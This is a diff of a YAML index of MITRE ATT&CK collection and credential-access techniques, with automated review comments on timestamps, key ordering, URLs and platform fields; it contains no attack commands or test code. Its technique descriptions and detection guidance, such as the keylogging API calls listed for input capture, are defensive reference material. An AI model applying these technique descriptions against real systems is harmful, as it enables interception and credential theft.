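Review bot: T1557.004 (Evil Twin) is added with `x_mitre_detection: ''` and `atomic_tests: []`; the other entries visible in this diff carry detection prose, so anything that renders that field should tolerate the empty string (the later T1213.004 addition has the same shape). The citation tags do survive the line-folded double-quoted description: `(Citation: Australia` followed by `‘Evil Twin’)` on the next line folds to a single space and matches `source_name: Australia ‘Evil Twin’` at the bottom of the hunk, but both sides depend on the same curly quote characters, so they must stay byte-identical if this file is ever touched by hand.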
@@ -48578,7 +49139,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -48608,8 +49169,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -48663,7 +49222,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -48700,7 +49258,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -48728,12 +49286,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -48770,23 +49326,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -48819,21 +49375,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
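Review bot: swapping the solution_monitor_dhcp_scopes URL for the web.archive.org snapshot and updating the retrieved date to September 12, 2024 is the right fix for a dead link, and the w32.tidserv.g reference just below already uses the same archive pattern. The T1557.001 `modified` change at the end of the hunk goes backwards (2023-04-25 → 2022-10-25) with no other edit to that object, so it should be confirmed against the source bundle rather than merged as-is.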
@@ -48941,12 +49496,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -48957,13 +49511,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -48977,6 +49531,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -48987,12 +49542,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -49037,30 +49592,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -49070,31 +49606,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
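Review bot: besides the reordering, this hunk drops `x_mitre_permissions_required: [User]` from T1213.001 and bumps x_mitre_version 1.0 → 1.1 alongside the description change that links "Testing / development credentials" to T1552. The permissions field is also removed from T1056 later in this PR (Administrator, SYSTEM, root, User), so the removal is consistent across objects, but any tooling in the repo that filters or displays atomics by required permission needs checking before merge.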
@@ -49127,10 +49680,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -49139,16 +49694,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
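Review bot: replacing the Office 365 and Google Workspace platforms with a single Office Suite entry for T1114.003 (together with the new 'Cloud Service: Cloud Service Metadata' data source and x_mitre_version 1.3 → 1.4) changes which per-platform indexes this technique lands in; any index derived from x_mitre_platforms must be regenerated in the same PR or the Office 365 and Google Workspace index files will silently lose the technique. T1114.002 receives the identical platform change further down, so the same check applies there.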
@@ -49180,70 +49736,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
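Review bot: for T1074 nearly every `-` line (platforms, domains, contributors, type, id, created, version, external_references, deprecated, revoked, created_by_ref, name, kill_chain_phases) is re-added further down in a different order, so the line diff overstates the change; the only value-level differences visible are `modified` 2022-11-08 → 2024-09-30, `spec_version: '2.1'` dropped, x_mitre_attack_spec_version 2.1.0 → 3.2.0, and the Mandiant M-Trends URL moved to the mandiant.com PDF (the same URL update applied to T1074.002 earlier). Reviewing with a structure-aware YAML comparison, or pinning key order in the generator, would make hunks like this trivially checkable.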
@@ -49316,7 +49868,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -49371,12 +49922,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -49388,6 +49938,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -49395,11 +49948,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -49416,14 +49969,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -49439,6 +49989,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -49447,13 +49998,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -49461,15 +50012,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -49480,9 +50027,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -49528,7 +50126,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
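Review bot: the `modified` timestamp for ARP Cache Poisoning moves backwards, from '2022-11-08T14:00:00.188Z' to '2022-07-22T18:37:22.176Z', and the same regression appears on the SNMP (MIB Dump) entry further down ('2021-04-29T14:49:39.188Z' to '2020-10-22T01:54:22.812Z'). If the index is regenerated from an upstream STIX bundle this can be legitimate, but a `modified` value going to an earlier date is the usual symptom of an older source bundle being fed to the generator; worth confirming which bundle produced this before merging.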
@@ -49547,37 +50145,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
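Review bot: the `x_mitre_version` bump to '1.2' is consistent with the one real content change in this hunk (the description now links `Unsecured Credentials` instead of saying "credentials"), but most of the hunk is key reordering (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique`, `x_mitre_platforms` move with identical values). If the generator writes keys in source order, a stable key ordering would keep future diffs down to actual changes. The removal of `spec_version: '2.1'` needs to be applied to every technique in the file, not just the ones touched here, so that the index does not end up with a mix of objects with and without it.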
@@ -49600,41 +50197,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
